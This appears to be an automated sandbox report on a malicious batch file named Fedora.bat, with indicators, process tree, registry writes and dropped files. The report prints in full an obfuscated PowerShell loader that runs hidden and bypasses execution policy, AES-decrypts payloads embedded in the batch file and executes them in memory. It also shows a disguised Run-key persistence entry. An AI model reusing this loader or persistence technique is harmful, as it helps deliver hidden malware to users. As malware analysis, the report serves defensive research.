File name: Fedora.bat

Full analysis: https://app.any.run/tasks/c1eb59df-44d1-444d-95b2-5b0cebc1d654
Verdict: Malicious activity
Analysis date: March 24, 2025, 13:54:22
OS: Windows 10 Professional (build: 19045, 64 bit)
Indicators:
MIME: text/plain
File info: ASCII text, with very long lines (65536), with no line terminators
MD5: BC8ED5024C0A92687A65B96A6E58718A
SHA1: 8F8FA35974FFD2C778343C64BD25D051A365E30B
SHA256: 7EE8506C982C0E86FFA495F432304E9C5B61BC4BDB0485BF99EA8BC4CE731966
SSDEEP: 3072:ZCANGztk2urqPe/ruVZs5eNWh/rlcQsKuE:XGzRuMe/qVY3rl/sO

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Changes powershell execution policy (Bypass)

      • cmd.exe (PID: 7868)
      • cmd.exe (PID: 1240)
    • Run PowerShell with an invisible window

      • powershell.exe (PID: 7944)
      • powershell.exe (PID: 1912)
    • Bypass execution policy to execute commands

      • powershell.exe (PID: 1912)
      • powershell.exe (PID: 7944)
    • Gets or sets the initialization vector for the symmetric algorithm (POWERSHELL)

      • powershell.exe (PID: 7944)
      • powershell.exe (PID: 1912)
    • Gets or sets the symmetric key that is used for encryption and decryption (POWERSHELL)

      • powershell.exe (PID: 7944)
      • powershell.exe (PID: 1912)
    • Uses AES cipher (POWERSHELL)

      • powershell.exe (PID: 7944)
      • powershell.exe (PID: 1912)
    • Dynamically loads an assembly (POWERSHELL)

      • powershell.exe (PID: 7944)
      • powershell.exe (PID: 1912)
  • SUSPICIOUS

    • Cryptography encrypted command line is found

      • powershell.exe (PID: 7944)
      • powershell.exe (PID: 1912)
    • Probably obfuscated PowerShell command line is found

      • cmd.exe (PID: 7868)
      • cmd.exe (PID: 1240)
    • The process bypasses the loading of PowerShell profile settings

      • cmd.exe (PID: 7868)
      • cmd.exe (PID: 1240)
    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 7868)
      • cmd.exe (PID: 1240)
    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 7944)
      • powershell.exe (PID: 1912)
    • The process executes VB scripts

      • powershell.exe (PID: 7944)
    • Executing commands from a ".bat" file

      • wscript.exe (PID: 5260)
    • Starts CMD.EXE for commands execution

      • wscript.exe (PID: 5260)
    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 5260)
  • INFO

    • Reads Microsoft Office registry keys

      • OpenWith.exe (PID: 6584)
    • Manual execution by a user

      • cmd.exe (PID: 7868)
    • Uses string split method (POWERSHELL)

      • powershell.exe (PID: 7944)
      • powershell.exe (PID: 1912)
    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 7944)
      • powershell.exe (PID: 1912)
    • Reads the software policy settings

      • BackgroundTransferHost.exe (PID: 7516)
No Malware configuration.

TRiD

.cnt | Help File Contents (100)
No data.
All screenshots are available in the full report
Total processes: 152
Monitored processes: 16
Malicious processes: 5
Suspicious processes: 0

Behavior graph

  • start
  • openwith.exe (no specs)
  • sppextcomobj.exe (no specs)
  • slui.exe
  • cmd.exe (no specs)
  • conhost.exe (no specs)
  • powershell.exe (no specs)
  • wscript.exe (no specs)
  • cmd.exe (no specs)
  • conhost.exe (no specs)
  • powershell.exe (no specs)
  • backgroundtransferhost.exe (no specs)
  • backgroundtransferhost.exe
  • backgroundtransferhost.exe (no specs)
  • backgroundtransferhost.exe (no specs)
  • backgroundtransferhost.exe (no specs)
  • slui.exe (no specs)

Process information

PID
CMD
Path
Indicators
Parent process
PID: 736
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 1096
CMD: "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
Path: C:\Windows\System32\BackgroundTransferHost.exe
Parent process: svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Download/Upload Host
Exit code:
1
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\backgroundtransferhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\bcryptprimitives.dll
PID: 1240
CMD: C:\WINDOWS\system32\cmd.exe /c ""C:\Users\admin\AppData\Local\Adobe-Hub\uxxbhtaqd5x11.bat" "
Path: C:\Windows\System32\cmd.exe
Parent process: wscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cmdext.dll
c:\windows\system32\advapi32.dll
PID: 1600
CMD: "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
Path: C:\Windows\System32\BackgroundTransferHost.exe
Parent process: svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Download/Upload Host
Exit code:
1
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\backgroundtransferhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\bcryptprimitives.dll
PID: 1912
CMD: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command $AOohLMBnxRyQWXffTUFsRfOSfpuMSlWsOLiZrnaajkFANCGLgWnruOAuavbvrPvlVgblPfNFUFjGznfCJJGWYEYZkNZWlEIuPuEHAvVaiHxOFTUMqzLIjzmqibabgRupXPRfIxboNFNqhjuqTmGMTZlqhozyuUUrnhQQcOdSxxVELWiYHKhT = 'C:\Users\admin\AppData\Local\Adobe-Hub\uxxbhtaqd5x11.bat'; $rdCQKQRbRyLjuLVLEOTQPTSTFWDJQmeJonzmhCAfGGnAkDdvtnCfFGixlJkNnilEtbUglJDcoOjjGrIbTipCKZeIfcayrMSyvJgiIWjKJzRQwYRUaiUeSIUuXmajIfKBWLOWkAtWZFTkinlgkgyiSNFNOMlwWZbEPqULkUJzPXfnPKmJaUYC=[System.Security.Cryptography.Aes]::Create(); $rdCQKQRbRyLjuLVLEOTQPTSTFWDJQmeJonzmhCAfGGnAkDdvtnCfFGixlJkNnilEtbUglJDcoOjjGrIbTipCKZeIfcayrMSyvJgiIWjKJzRQwYRUaiUeSIUuXmajIfKBWLOWkAtWZFTkinlgkgyiSNFNOMlwWZbEPqULkUJzPXfnPKmJaUYC.Mode=[System.Security.Cryptography.CipherMode]::CBC; $rdCQKQRbRyLjuLVLEOTQPTSTFWDJQmeJonzmhCAfGGnAkDdvtnCfFGixlJkNnilEtbUglJDcoOjjGrIbTipCKZeIfcayrMSyvJgiIWjKJzRQwYRUaiUeSIUuXmajIfKBWLOWkAtWZFTkinlgkgyiSNFNOMlwWZbEPqULkUJzPXfnPKmJaUYC.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $rdCQKQRbRyLjuLVLEOTQPTSTFWDJQmeJonzmhCAfGGnAkDdvtnCfFGixlJkNnilEtbUglJDcoOjjGrIbTipCKZeIfcayrMSyvJgiIWjKJzRQwYRUaiUeSIUuXmajIfKBWLOWkAtWZFTkinlgkgyiSNFNOMlwWZbEPqULkUJzPXfnPKmJaUYC.Key=[System.Convert]::FromBase64String('kFtftI+s00kZRMSHam6GCX+w9PUdKxekjkw+JFIw4e0='); $rdCQKQRbRyLjuLVLEOTQPTSTFWDJQmeJonzmhCAfGGnAkDdvtnCfFGixlJkNnilEtbUglJDcoOjjGrIbTipCKZeIfcayrMSyvJgiIWjKJzRQwYRUaiUeSIUuXmajIfKBWLOWkAtWZFTkinlgkgyiSNFNOMlwWZbEPqULkUJzPXfnPKmJaUYC.IV=[System.Convert]::FromBase64String('VoLwgkvwhw5sSTeuVWRJlA==');function decrypt_function($param_var){ 
$HCIifbixoWaZDpvRtAWqwYsVHrXeABvcbzWmHLFiMllSWgJzouqAXIfIjNANddXNBYXesikHUNDlNzYBIyPglUestncUlRfIoyrXiFhgjJFjeUVKOZfFoQCHTEKegqwcIVWpiasdqJWBoVozrsflMAuxWKeDUcaTnCBjXGBNHcoFUasYqlMN=$rdCQKQRbRyLjuLVLEOTQPTSTFWDJQmeJonzmhCAfGGnAkDdvtnCfFGixlJkNnilEtbUglJDcoOjjGrIbTipCKZeIfcayrMSyvJgiIWjKJzRQwYRUaiUeSIUuXmajIfKBWLOWkAtWZFTkinlgkgyiSNFNOMlwWZbEPqULkUJzPXfnPKmJaUYC.CreateDecryptor(); $kkqiBzsyWOioJdoLueBLQsEJlPDVrfnIpmIcmtIyndQSTaVQLGEmJbXSGHWLVxgRBAYwvmzbwdxNBLPlTMkLAbZooPvEwWCQWZrtbyvzgDPFEkrVRKSjnvqABKiFQVEzBGQCuwjurKEXltJeyAMMdsDBIQSrqQIlZpeYtPBvAySCRtphadgq=$HCIifbixoWaZDpvRtAWqwYsVHrXeABvcbzWmHLFiMllSWgJzouqAXIfIjNANddXNBYXesikHUNDlNzYBIyPglUestncUlRfIoyrXiFhgjJFjeUVKOZfFoQCHTEKegqwcIVWpiasdqJWBoVozrsflMAuxWKeDUcaTnCBjXGBNHcoFUasYqlMN.TransformFinalBlock($param_var, 0, $param_var.Length); $kkqiBzsyWOioJdoLueBLQsEJlPDVrfnIpmIcmtIyndQSTaVQLGEmJbXSGHWLVxgRBAYwvmzbwdxNBLPlTMkLAbZooPvEwWCQWZrtbyvzgDPFEkrVRKSjnvqABKiFQVEzBGQCuwjurKEXltJeyAMMdsDBIQSrqQIlZpeYtPBvAySCRtphadgq;}function execute_function($param_var,$param2_var){ $dpYpkmExViounVpjXhhIbxMBPCZosaRqRECeVQAILcENjaGsRqVLHbnGDwzHnpeVrYDIskngGzXZSYrPWGxcefIQrWBzqTuvXIwlxXZHcOehdnOEeKKGScRlqMqwJOQNeCbjCgrYGPZqbAMdhXuFiOCVRkVKHDYoXrdBmEbYtMadcBkPamoM=[System.Reflection.Assembly]::Load([byte[]]$param_var); $tlEqZgrskGrdRLsJxlRDVwlwNzSqafKuolVMMMCfmJNMuWlrjAsOuLQWZiCznbrfWWOFPFWKJMqmIzbQoBhzNVZCvYNEjcRlrIQxiFBDDHfIvDnzgLlMTSraXmjRSsBGVfVaJEIIaDWfPrhSKnxxQfrzqPAVvJLkgzNpHnQCdDLpWmlFergE=$dpYpkmExViounVpjXhhIbxMBPCZosaRqRECeVQAILcENjaGsRqVLHbnGDwzHnpeVrYDIskngGzXZSYrPWGxcefIQrWBzqTuvXIwlxXZHcOehdnOEeKKGScRlqMqwJOQNeCbjCgrYGPZqbAMdhXuFiOCVRkVKHDYoXrdBmEbYtMadcBkPamoM.EntryPoint; $tlEqZgrskGrdRLsJxlRDVwlwNzSqafKuolVMMMCfmJNMuWlrjAsOuLQWZiCznbrfWWOFPFWKJMqmIzbQoBhzNVZCvYNEjcRlrIQxiFBDDHfIvDnzgLlMTSraXmjRSsBGVfVaJEIIaDWfPrhSKnxxQfrzqPAVvJLkgzNpHnQCdDLpWmlFergE.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 
$AOohLMBnxRyQWXffTUFsRfOSfpuMSlWsOLiZrnaajkFANCGLgWnruOAuavbvrPvlVgblPfNFUFjGznfCJJGWYEYZkNZWlEIuPuEHAvVaiHxOFTUMqzLIjzmqibabgRupXPRfIxboNFNqhjuqTmGMTZlqhozyuUUrnhQQcOdSxxVELWiYHKhT;$gPpICRaBdJabrvwYleibbUhJwAYSUoJMnhwLAbLGvzkfOTVhkGiOytCmHGmcThHPZoOjZLxktCGBJbUCERHnfVoTFjeUPIMnRvfAeMhziYuWMaDGLJycztJeZUEPGDvKPsKnVtxRJhehAshEGxigkKNxMbBkirTEDKgtqpKslGsroBDHNZji = [type]::GetType('Syst'+'em'+'.I'+'O.F'+'i'+'l'+'e');$vozeFmBTSnJrozEQlNoqNQUDrvjkyTxiiKjokbOeOQzXXbdOXNvaLSvFuWNjcqvZQAjEqpFkYkCWqXGqsunLxwxpoEUooFbxvAhwSyyHhlcAqyowpxQIdKBtdTpMvqVsifBQPkxUVFDmuWZQpxZRPsuKYOtYiMlRqJslWyHfZWNxhpYgTzxY = [type]::GetType('S'+'ys'+'tem'+'.Env'+'iro'+'nme'+'nt');$VdQPNwKUdNmrSLZqESkxwVunubDeDUReCgpdIXBlCWyqquxkmUbmgJhaICvMTGqjViOLvWHGqZUAweXaEsRJTEXTZpugCPrWGpuiFLPqmuWhPHDEFvhBOGpqkVMgBBeAHXUhKOuSCBwzIQdsLQAgHQiZadXKZIOLpvzRNwTQbpYnkQHtRtvL = $gPpICRaBdJabrvwYleibbUhJwAYSUoJMnhwLAbLGvzkfOTVhkGiOytCmHGmcThHPZoOjZLxktCGBJbUCERHnfVoTFjeUPIMnRvfAeMhziYuWMaDGLJycztJeZUEPGDvKPsKnVtxRJhehAshEGxigkKNxMbBkirTEDKgtqpKslGsroBDHNZji::ReadAllText($AOohLMBnxRyQWXffTUFsRfOSfpuMSlWsOLiZrnaajkFANCGLgWnruOAuavbvrPvlVgblPfNFUFjGznfCJJGWYEYZkNZWlEIuPuEHAvVaiHxOFTUMqzLIjzmqibabgRupXPRfIxboNFNqhjuqTmGMTZlqhozyuUUrnhQQcOdSxxVELWiYHKhT);$bXSQPUgGRKSTMLjmqmFoWJfsSUPkvDSFndKsDIcSpnZqweBzGvcFOgPrRAYUfWknRmFJaRJHjMYJKOVNtpDaAmQgosAdKhNscLzkyRyPLvvcigHcElBPtkMEvyvIqGXcZFGYpLoBRNofROYiKxyzGXZSYUOZwPyfxtdCzJMTWZYFVHNHAnXT = $vozeFmBTSnJrozEQlNoqNQUDrvjkyTxiiKjokbOeOQzXXbdOXNvaLSvFuWNjcqvZQAjEqpFkYkCWqXGqsunLxwxpoEUooFbxvAhwSyyHhlcAqyowpxQIdKBtdTpMvqVsifBQPkxUVFDmuWZQpxZRPsuKYOtYiMlRqJslWyHfZWNxhpYgTzxY::NewLine;$iyvbGNZvWoebojIxLvIbKECHYtXrggzjSFXZYbWMJrWIUXrMZqWeEVjDVOdmQHpQOViJlIzJzVrtHUMbcksPkuEWwtdkYJWcbgTZOHAqRmFJDPWbbbkFpAFuqlnSFpLPZpsAaNmuKcXXPVsGxbiWzrNAAzJCtILCAQJoxvaoPPUnCHFuSHvD = 
$VdQPNwKUdNmrSLZqESkxwVunubDeDUReCgpdIXBlCWyqquxkmUbmgJhaICvMTGqjViOLvWHGqZUAweXaEsRJTEXTZpugCPrWGpuiFLPqmuWhPHDEFvhBOGpqkVMgBBeAHXUhKOuSCBwzIQdsLQAgHQiZadXKZIOLpvzRNwTQbpYnkQHtRtvL.Split($bXSQPUgGRKSTMLjmqmFoWJfsSUPkvDSFndKsDIcSpnZqweBzGvcFOgPrRAYUfWknRmFJaRJHjMYJKOVNtpDaAmQgosAdKhNscLzkyRyPLvvcigHcElBPtkMEvyvIqGXcZFGYpLoBRNofROYiKxyzGXZSYUOZwPyfxtdCzJMTWZYFVHNHAnXT);$kIwYEAYuYCTSKvdatEoejOpvdGFlfBRKNbgFLSmBQIUUEdTpSiFcwcJwsaUXVNpxLifJoyoAsMoAUvRaNpsWWPoKrKmKYoFdtwivXkauUeJJOiCXjTjGvsBWUvrElECdglhxmvdDoXcRfEViipAefZIbVmACSwjpCGDDbfLNQGrxqJQpzjwW = $iyvbGNZvWoebojIxLvIbKECHYtXrggzjSFXZYbWMJrWIUXrMZqWeEVjDVOdmQHpQOViJlIzJzVrtHUMbcksPkuEWwtdkYJWcbgTZOHAqRmFJDPWbbbkFpAFuqlnSFpLPZpsAaNmuKcXXPVsGxbiWzrNAAzJCtILCAQJoxvaoPPUnCHFuSHvD;foreach ($vYVxzapPhhTEQLheIgCPCaTrdXNTWXVmvjxfiKgPvqeHFEZkupUrLnfvfDtCnvSklGiHnbWYaNumVlMzYCyHcDBidcaEqECZyUwYvrWttWrXTSzTQUEKXliHfaDlbrIwkuOaPOdGGfngmDokCgNwaScmLOSuNLscoVNyezecQXeSXcvCMtJU in $kIwYEAYuYCTSKvdatEoejOpvdGFlfBRKNbgFLSmBQIUUEdTpSiFcwcJwsaUXVNpxLifJoyoAsMoAUvRaNpsWWPoKrKmKYoFdtwivXkauUeJJOiCXjTjGvsBWUvrElECdglhxmvdDoXcRfEViipAefZIbVmACSwjpCGDDbfLNQGrxqJQpzjwW) { if ($vYVxzapPhhTEQLheIgCPCaTrdXNTWXVmvjxfiKgPvqeHFEZkupUrLnfvfDtCnvSklGiHnbWYaNumVlMzYCyHcDBidcaEqECZyUwYvrWttWrXTSzTQUEKXliHfaDlbrIwkuOaPOdGGfngmDokCgNwaScmLOSuNLscoVNyezecQXeSXcvCMtJU.StartsWith(':: ')) { $dxYgDgCZUAKSOMpzbsgcDNozHkKlwldJZmmeHwaVDLSpVzJDurogctsqjzysvqDJxbSBAlREskzSUYDiBhReWWHGUWUiXHAmijSUGhdiAKORTAvlVqRnyzNBtmHDrIGLKnJLfIBteIDlhPNtAInHPnNJvqAuAzRSedhGQKfmOyjQVCtDyndI=$vYVxzapPhhTEQLheIgCPCaTrdXNTWXVmvjxfiKgPvqeHFEZkupUrLnfvfDtCnvSklGiHnbWYaNumVlMzYCyHcDBidcaEqECZyUwYvrWttWrXTSzTQUEKXliHfaDlbrIwkuOaPOdGGfngmDokCgNwaScmLOSuNLscoVNyezecQXeSXcvCMtJU.Substring(3); break; }}$payloads_var=[string[]]$dxYgDgCZUAKSOMpzbsgcDNozHkKlwldJZmmeHwaVDLSpVzJDurogctsqjzysvqDJxbSBAlREskzSUYDiBhReWWHGUWUiXHAmijSUGhdiAKORTAvlVqRnyzNBtmHDrIGLKnJLfIBteIDlhPNtAInHPnNJvqAuAzRSedhGQKfmOyjQVCtDyndI.Split('\');$payload1_var= decrypt_function 
([Convert]::FromBase64String($payloads_var[0]));$payload2_var= decrypt_function ([Convert]::FromBase64String($payloads_var[1]));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
4294967295
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\atl.dll
c:\windows\system32\combase.dll
PID: 5260
CMD: "C:\WINDOWS\System32\WScript.exe" "C:\Users\admin\AppData\Local\Adobe-Hub\uxxbhtaqd5x11.vbs"
Path: C:\Windows\System32\wscript.exe
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.812.10240.16384
Modules
Images
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 5392
CMD: "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
Path: C:\Windows\System32\BackgroundTransferHost.exe
Parent process: svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Download/Upload Host
Exit code:
1
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\backgroundtransferhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\bcryptprimitives.dll
PID: 6248
CMD: "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
Path: C:\Windows\System32\BackgroundTransferHost.exe
Parent process: svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Download/Upload Host
Exit code:
1
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\backgroundtransferhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\bcryptprimitives.dll
PID: 6584
CMD: "C:\WINDOWS\System32\OpenWith.exe" C:\Users\admin\Desktop\Fedora.bat.cnt
Path: C:\Windows\System32\OpenWith.exe
Parent process: explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Pick an app
Exit code:
2147943623
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\openwith.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
PID: 7332
CMD: C:\WINDOWS\system32\SppExtComObj.exe -Embedding
Path: C:\Windows\System32\SppExtComObj.Exe
Parent process: svchost.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
KMS Connection Broker
Version:
10.0.19041.3996 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\sppextcomobj.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\oleaut32.dll
Total events: 12 047
Read events: 12 030
Write events: 17
Delete events: 0

Modification events

(PID) Process: (7944) powershell.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Operation: write
Name: RtkAudUService
Value: C:\Users\admin\AppData\Local\Adobe-Hub\uxxbhtaqd5x11.vbs

(PID) Process: (7944) powershell.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.vbs\OpenWithProgids
Operation: write
Name: VBSFile
Value:

(PID) Process: (5392) BackgroundTransferHost.exe
Key: HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Internet Settings\Cache\Content
Operation: write
Name: CachePrefix
Value:

(PID) Process: (5392) BackgroundTransferHost.exe
Key: HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Internet Settings\Cache\Cookies
Operation: write
Name: CachePrefix
Value: Cookie:

(PID) Process: (5392) BackgroundTransferHost.exe
Key: HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Internet Settings\Cache\History
Operation: write
Name: CachePrefix
Value: Visited:

(PID) Process: (7516) BackgroundTransferHost.exe
Key: HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Internet Settings\Cache\Content
Operation: write
Name: CachePrefix
Value:

(PID) Process: (7516) BackgroundTransferHost.exe
Key: HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Internet Settings\Cache\Cookies
Operation: write
Name: CachePrefix
Value: Cookie:

(PID) Process: (7516) BackgroundTransferHost.exe
Key: HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Internet Settings\Cache\History
Operation: write
Name: CachePrefix
Value: Visited:

(PID) Process: (6248) BackgroundTransferHost.exe
Key: HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Internet Settings\Cache\Content
Operation: write
Name: CachePrefix
Value:

(PID) Process: (6248) BackgroundTransferHost.exe
Key: HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Internet Settings\Cache\Cookies
Operation: write
Name: CachePrefix
Value: Cookie:
Executable files: 0
Suspicious files: 6
Text files: 6
Unknown types: 0

Dropped files

PID
Process
Filename
Type
PID: 7516
Process: BackgroundTransferHost.exe
Filename: C:\Users\admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\707a6539-2232-46c5-ad59-2a51fba71ae5.down_data
MD5:
SHA256:

PID: 7516
Process: BackgroundTransferHost.exe
Filename: C:\Users\admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\Content\26C212D9399727259664BDFCA073966E_F9F7D6A7ECE73106D2A8C63168CDA10D
Type: binary
MD5: 4872BABAF39AA62B8D32695EBB7E9173
SHA256: 2EE85DF86EE29BBEB3DCA81AA29B6DE204F605A2769B84C728A329178A2D0999

PID: 7944
Process: powershell.exe
Filename: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_sfsswxsn.esu.psm1
Type: text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7

PID: 7944
Process: powershell.exe
Filename: C:\Users\admin\AppData\Local\Adobe-Hub\uxxbhtaqd5x11.vbs
Type: text
MD5: 0449B7207BB68AA8D3B6F73B8C66088D
SHA256: 67068058C0A33FB06331741B4F2D85B984ED7AF22D8F19DEA700FFEAB996FD36

PID: 7944
Process: powershell.exe
Filename: C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Type: binary
MD5: ED224F49E1E808CBA695270499DB54B7
SHA256: 57A436248566BEC413EC218CF6064996CB7A6BC4753F85940FDF92098B96E4CC

PID: 1912
Process: powershell.exe
Filename: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_meaavdaw.hqr.ps1
Type: text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7

PID: 7944
Process: powershell.exe
Filename: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_bfx0z2yw.awx.ps1
Type: text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7

PID: 1912
Process: powershell.exe
Filename: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_4juj3sa1.alm.psm1
Type: text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7

PID: 7516
Process: BackgroundTransferHost.exe
Filename: C:\Users\admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\920d1ee9-35aa-4cfd-a4b8-bc9c3be3af3c.up_meta_secure
Type: binary
MD5: F6C6FCBF18E5D2604A46D69020E9B9E5
SHA256: CB2E7C76863634E5DA47463BCD91CFEF7EE2860827E289318DE048DBE1DE73BF

PID: 7516
Process: BackgroundTransferHost.exe
Filename: C:\Users\admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\920d1ee9-35aa-4cfd-a4b8-bc9c3be3af3c.77546dd5-0094-45b8-a465-52b0f5db595e.down_meta
Type: binary
